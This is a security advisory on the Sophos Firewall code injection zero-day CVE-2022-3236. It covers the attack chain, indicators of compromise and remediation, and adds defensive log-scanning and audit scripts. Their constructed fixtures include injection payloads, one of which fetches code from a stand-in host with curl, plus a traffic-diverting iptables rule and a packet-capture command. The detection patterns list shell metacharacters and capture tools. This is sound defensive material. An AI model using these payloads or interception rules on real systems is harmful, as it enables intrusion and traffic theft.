CVE REFERENCE | CRITICAL VULNERABILITY
Active Threat

CVE-2022-3236: Sophos Firewall Code Injection Zero-Day

A critical unauthenticated code injection in Sophos Firewall's User Portal and Webadmin, exploited as a zero-day by a Chinese APT to intercept network traffic and plant persistent backdoors across South Asian targets

- CVSS score: 9.8
- 0-day: exploited before disclosure
- Attributed threat actor: Chinese APT
- Delivery method: auto-hotfix (caveats apply)

CVE-2022-3236 is a critical unauthenticated code injection vulnerability in the User Portal and Webadmin interfaces of Sophos Firewall (formerly XG Firewall), disclosed in September 2022 and already being exploited as a zero-day at the time of disclosure. Volexity's threat research attributed the campaign to a Chinese APT cluster it tracks as Storm Cloud, which used the vulnerability to obtain root-level code execution on internet-facing firewall appliances at organizations in South and Southeast Asia. Post-exploitation activity included traffic interception, credential harvesting, and deployment of persistent backdoors designed to survive standard firmware upgrades.

Vulnerability Details: User Portal and Webadmin Injection

Sophos Firewall (SFOS) exposes two web interfaces: the User Portal (self-service for VPN and other end-user functions, served on TCP 443 by default) and Webadmin (the administrative interface, served on TCP 4444 by default). Both ports are configurable, and both interfaces process user-supplied HTTP request parameters as part of their normal function.

CVE-2022-3236 exists in a component shared by both interfaces that failed to sanitize certain request parameters before handing them to OS-level command execution. An unauthenticated attacker can therefore inject OS commands through those parameters, and they run as root on the underlying appliance (SFOS is a hardened Linux distribution).

Root-level RCE on the firewall appliance grants complete control: modification of firewall rules, packet capture of all passing traffic, access to VPN credential stores, and the ability to plant persistence mechanisms at any level of the OS.

Storm Cloud APT Campaign: Backdoors and Traffic Interception

Volexity's investigation describes a multi-stage compromise chain that Storm Cloud deployed after initial CVE-2022-3236 exploitation:

**Asnarök variant**: A modified version of the Asnarök malware family (previously used in the 2020 Sophos XG zero-day campaign) was deployed for persistence. The malware writes to partition locations not covered by standard Sophos integrity checking, surviving firmware upgrades.

**Traffic interception**: Attackers modified iptables rules and deployed packet capture tooling on the compromised firewall to intercept traffic passing through it. Because the firewall is the VPN endpoint, remote-access and site-to-site sessions are decrypted on the appliance itself, so their plaintext was available to the capture tooling.

**Credential harvesting**: VPN credentials of users authenticating through the compromised appliance were captured from the decrypted traffic stream.

**Lateral movement**: Using harvested credentials, Storm Cloud moved laterally to internal network systems accessible via VPN, deploying Gh0st RAT and the TSTRAT backdoor on Windows endpoints.

Attack Chain

Storm Cloud's exploitation and post-compromise sequence:

1. **Identify an internet-exposed interface.** Scan for Sophos Firewall User Portal or Webadmin interfaces reachable from the internet; the defaults are TCP 443 for the User Portal and TCP 4444 for Webadmin, though both are configurable.
2. **Unauthenticated code injection.** Send a crafted HTTP request with OS commands injected into the vulnerable parameters; the commands execute as root on the SFOS Linux appliance with no authentication.
3. **Asnarök persistence installed.** Deploy the Asnarök-variant backdoor to persistent storage locations outside standard SFOS integrity-check coverage, so that it survives a routine firmware upgrade.
4. **Traffic interception enabled.** Modify the iptables ruleset and start packet capture to intercept traffic flowing through the firewall, including decrypted VPN sessions and internal communications.
5. **Lateral movement and RAT deployment.** Use harvested VPN credentials to reach the internal network; deploy Gh0st RAT and the TSTRAT backdoor on internal Windows endpoints for persistent espionage access.

Indicators of Compromise

Known artifacts from CVE-2022-3236 exploitation and the Storm Cloud campaign:

| Artifact | Where to look | Notes |
| --- | --- | --- |
| Unexpected binaries in /bin/, /usr/bin/, or the persistent storage partitions of the appliance | Filesystem (SFOS Linux) | Compare installed binaries against the Sophos-published firmware manifest; Asnarök variants place files in locations outside standard SFOS update coverage |
| Outbound connections from the firewall to non-Sophos infrastructure on unusual ports | Network telemetry (firewall egress) | C2 callbacks from the appliance itself; a Sophos Firewall should talk only to Sophos update servers and any configured partner cloud services |
| Modified iptables rules, or unexpected packet-capture processes (tcpdump, dumpcap) running on the firewall | Process list and iptables ruleset (SFOS Linux) | Traffic interception tooling planted by Storm Cloud; compare the ruleset against a baseline from a known-good device |
| Anomalous HTTP requests to User Portal or Webadmin paths with unusual parameter encoding | SFOS access log | Exploitation attempts; look for URL-encoded shell metacharacters in parameter values |
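The last row of the table, as an added detection example that is not from the original article or from Sophos: a scanner over access-log lines that flags requests to the User Portal or Webadmin paths whose decoded parameter values contain shell metacharacters. The `/userportal/` and `/webconsole/` path prefixes and the combined-log field layout are assumptions for this example, and the sample lines are constructed, not captured from a real device. Values are decoded a second time so that double URL encoding does not slip past the check.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path prefixes of the two interfaces named in the advisory. Assumed here from
# the product's URL layout, not taken from the article. Default ports are 443
# (User Portal) and 4444 (Webadmin); the path is what identifies the interface.
INTERFACE_PREFIXES = ("/userportal/", "/webconsole/")

# Shell metacharacters that never belong in a portal form parameter.
SHELL_META = re.compile(r";|\|\||\||&&|`|\$\(|\$\{|\r|\n|<|>")

# Combined-log-style access line: source, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real SFOS output, whose layout differs; the
# fields this script needs are the same). Two lines carry an injection attempt,
# one is a benign Webadmin login, one is unrelated static content with a ';'.
SAMPLE_LOG = """\
203.0.113.10 - - [23/Sep/2022:10:01:02 +0000] "GET /userportal/webpages/myaccount/login.jsp HTTP/1.1" 200 5123
203.0.113.10 - - [23/Sep/2022:10:01:05 +0000] "POST /userportal/Controller?user=admin%3Bid HTTP/1.1" 200 312
198.51.100.7 - - [23/Sep/2022:10:02:11 +0000] "GET /webconsole/webpages/login.jsp?next=%2Fwebconsole%2F HTTP/1.1" 200 4009
198.51.100.7 - - [23/Sep/2022:10:02:40 +0000] "GET /webconsole/Controller?name=a%2524%2528curl%2520http%253A%252F%252F198.51.100.99%252Fx%2529 HTTP/1.1" 500 0
192.0.2.55 - - [23/Sep/2022:10:03:00 +0000] "GET /static/logo.png?v=1;2 HTTP/1.1" 200 2200
"""


def decode_params(target):
    """Split a request target into path and parameters. parse_qsl decodes
    once; the extra unquote catches double encoding (%2524 -> %24 -> $)."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return parts.path, [(k, unquote(v)) for k, v in pairs]


def suspicious_params(target):
    """(name, value) pairs of an interface request whose decoded value holds a
    shell metacharacter; [] for non-interface paths or clean parameters."""
    path, params = decode_params(target)
    if not path.startswith(INTERFACE_PREFIXES):
        return []
    return [(k, v) for k, v in params if SHELL_META.search(v)]


def scan_log(text):
    """Return one finding per access-log line that targets the User Portal or
    Webadmin with shell metacharacters in a decoded parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["target"])
        if hits:
            findings.append({
                "src": m["src"], "ts": m["ts"], "method": m["method"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]), "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['method']} {f['path']} status={f['status']}")
        for name, value in f["params"]:
            print(f"    {name} = {value!r}")
```

Only query strings appear in an access log; parameters sent in a POST body are not visible there, so pair this with request-body capture from a reverse proxy or WAF in front of the interfaces if one exists. A hit on a 500 status after a run of 200s from the same source is a common shape for failed-then-successful injection attempts and is worth prioritising.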


Remediation

Steps in order of urgency:

Verify hotfix application and apply manually if needed

Confirm the September 2022 hotfix was applied to every Sophos Firewall device. Sophos delivered it automatically only to devices on supported SFOS versions that had outbound connectivity to Sophos update servers and the "Allow automatic installation of hotfixes" option enabled; devices on restricted networks, or with that option turned off, did not receive it. Check the SFOS version and hotfix status in the admin interface, apply the manual hotfix package for affected versions following Sophos KB-000045839, and plan an upgrade to a release that carries the fix natively (SFOS v19.5 GA and later).

Restrict internet access to User Portal and Webadmin

Management interfaces should never be reachable directly from the internet. Sophos's own guidance for this advisory is to ensure the User Portal and Webadmin are not exposed on the WAN zone; restrict both to trusted source IPs or require a VPN connection before they can be reached. This removes the unauthenticated attack surface for this and any future Sophos Firewall web-interface vulnerability.

Audit the firewall filesystem for unauthorized modifications

If the device was internet-exposed before hotfix application, compare all installed binaries and scripts against the Sophos-published SFOS manifest for the installed version. Unexpected binaries or modifications to startup scripts indicate compromise.
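An added audit script, not from the article or from Sophos, that implements this step together with the iptables and packet-capture rows of the IOC table: it diffs an `iptables-save` ruleset against a baseline and flags new rules whose target copies or diverts packets, looks for capture tools in `ps` output, and compares file hashes against an expected manifest. Every input is constructed inline; the manifest hashes are of placeholder bytes and say nothing about genuine SFOS binaries. A real run would use the Sophos-published manifest for the installed version and a baseline ruleset captured from a known-good appliance of the same version.

```python
import hashlib
import re

# Constructed iptables-save snapshots: a baseline captured from a known-good
# appliance of the same SFOS version, and the ruleset from the device under
# review. The rules are illustrative, not Sophos defaults.
BASELINE_RULES = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
COMMIT
"""
CURRENT_RULES = BASELINE_RULES + """\
*mangle
:PREROUTING ACCEPT [0:0]
-A PREROUTING -i tun0 -j TEE --gateway 198.51.100.99
-A PREROUTING -p tcp --dport 443 -j NFLOG --nflog-group 7
COMMIT
"""
# Targets that copy or divert packets: a new rule with one of these is
# interception until proven otherwise.
TAP_TARGETS = {"TEE", "NFLOG", "NFQUEUE", "LOG", "MIRROR"}
CAPTURE_BINARIES = {"tcpdump", "dumpcap", "tshark", "tcpflow", "ngrep"}

# Constructed `ps -eo pid,user,comm,args` output.
PS_OUTPUT = """\
  PID USER     COMMAND         COMMAND
    1 root     init            /sbin/init
  842 root     sshd            /usr/sbin/sshd
 1311 root     tcpdump         tcpdump -i tun0 -w /var/tmp/.x/cap.pcap
 1402 nobody   apache2         /usr/sbin/apache2
"""

def sha256(data):
    return hashlib.sha256(data).hexdigest()

# Constructed manifest and file contents. A real audit uses the manifest
# Sophos publishes for the installed version; these placeholder bytes say
# nothing about genuine SFOS binaries.
EXPECTED_MANIFEST = {"/bin/busybox": sha256(b"busybox-good"),
                     "/usr/bin/sshd": sha256(b"sshd-good")}
OBSERVED_FILES = {"/bin/busybox": b"busybox-good",
                  "/usr/bin/sshd": b"sshd-trojaned",
                  "/usr/bin/.s": b"dropped binary"}

def parse_iptables_save(text):
    """Return the set of (table, rule) pairs in iptables-save output."""
    rules, table = set(), None
    for line in text.splitlines():
        if line.startswith("*"):
            table = line[1:].strip()
        elif line.startswith("-A "):
            rules.add((table, line.strip()))
    return rules

def diff_rules(baseline_text, current_text):
    """Rules added/removed versus baseline, plus added rules with tap targets."""
    base, cur = parse_iptables_save(baseline_text), parse_iptables_save(current_text)
    added, removed = sorted(cur - base), sorted(base - cur)
    def target(rule):
        m = re.search(r"-j (\S+)", rule)
        return m.group(1) if m else None
    return {"added": added, "removed": removed,
            "taps": [r for r in added if target(r[1]) in TAP_TARGETS]}

def find_capture_processes(ps_text):
    """Processes whose command name or argv[0] is a known capture tool."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, user, comm, args = parts
        argv0 = args.split()[0].rsplit("/", 1)[-1]
        if comm in CAPTURE_BINARIES or argv0 in CAPTURE_BINARIES:
            hits.append({"pid": int(pid), "user": user, "args": args})
    return hits

def compare_manifest(expected, observed):
    """Files whose hash differs from the manifest, files not in it, and
    manifest entries that are absent from the filesystem."""
    modified = sorted(p for p, d in observed.items()
                      if p in expected and sha256(d) != expected[p])
    unexpected = sorted(p for p in observed if p not in expected)
    missing = sorted(p for p in expected if p not in observed)
    return {"modified": modified, "unexpected": unexpected, "missing": missing}

def audit(baseline_rules, current_rules, ps_text, expected, observed):
    """Run all three checks; 'suspicious' is True if any of them fires."""
    rules = diff_rules(baseline_rules, current_rules)
    procs = find_capture_processes(ps_text)
    files = compare_manifest(expected, observed)
    suspicious = bool(rules["taps"] or procs or files["modified"] or files["unexpected"])
    return {"rules": rules, "capture_processes": procs, "files": files,
            "suspicious": suspicious}
```

Collect `iptables-save`, `ps` output and file hashes from the appliance and run the comparison offline rather than on the device: a compromised firewall may have had its own `ps`, `sha256sum` or shell replaced, so anything computed on it is only as trustworthy as the binaries it ran. Any non-empty `taps`, capture process, or modified or unexpected file is grounds for the factory-reset step that follows.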

Factory reset if compromise is confirmed or suspected

Volexity confirmed that Asnarök-variant backdoors survive standard firmware upgrades by writing to unmonitored persistent storage partitions. If compromise is suspected, the only reliable remediation is a factory reset to a verified clean base image followed by applying the current patched SFOS firmware before reconnecting to the network.

Rotate VPN credentials and review internal access

If the firewall was compromised, all VPN credentials of users who authenticated during the compromise window should be considered exposed and must be rotated. Review internal network logs for lateral movement originating from IP addresses within the VPN segment.

The bottom line

CVE-2022-3236 is the third Sophos Firewall zero-day attributed to Chinese APT actors in roughly two and a half years, following CVE-2020-12271 in April 2020 and CVE-2022-1040 in March 2022. This pattern indicates persistent, dedicated vulnerability research into Sophos Firewall products by well-resourced threat actors who consider the platform a high-value intelligence access point. Organizations using Sophos Firewall must treat management interface isolation as a critical architectural requirement, not an optional hardening measure, and should apply patches with the same urgency applied to any internet-facing perimeter device.

Frequently asked questions

Is CVE-2022-3236 the same as the 2020 Sophos XG Firewall zero-day?

No. The 2020 campaign exploited CVE-2020-12271 (SQL injection RCE via a different attack surface). CVE-2022-3236 is a separate code injection vulnerability. However, both campaigns deployed variants of the Asnarök malware and share infrastructure patterns consistent with the same Chinese APT cluster, suggesting persistent research investment in Sophos Firewall exploitation.

Did the automatic Sophos hotfix protect all customers?

No. Sophos's automatic hotfix delivery requires outbound internet connectivity from the firewall to Sophos update servers. Devices on air-gapped networks or with restricted outbound connectivity did not receive the automatic update and required manual hotfix installation — a gap that left many enterprise deployments exposed beyond the initial patch window.

Should we consider a factory reset even after applying the hotfix?

Yes, if your device was internet-exposed before the hotfix was applied. Volexity's research confirmed that the Asnarök-variant malware deployed by Storm Cloud modifies the Sophos Firewall Linux base in ways that survive standard firmware upgrades. A factory reset to a verified clean base image followed by the current patched firmware is the only reliable remediation if compromise is suspected.

Sources & references

  1. Sophos Security Advisory sophos-sa-20220923-sfos-rce: Resolved RCE in User Portal and Webadmin of Sophos Firewall (CVE-2022-3236)
  2. Volexity: Storm Cloud exploiting Sophos Firewall zero-day
  3. CISA alert: Sophos Firewall vulnerability (CVE-2022-3236)

Author: Eric Bang, Founder & Cybersecurity Evangelist, Decryption Digest. Covers zero-days, ransomware, and nation-state operations, with a background in threat intelligence, vulnerability research, and enterprise security.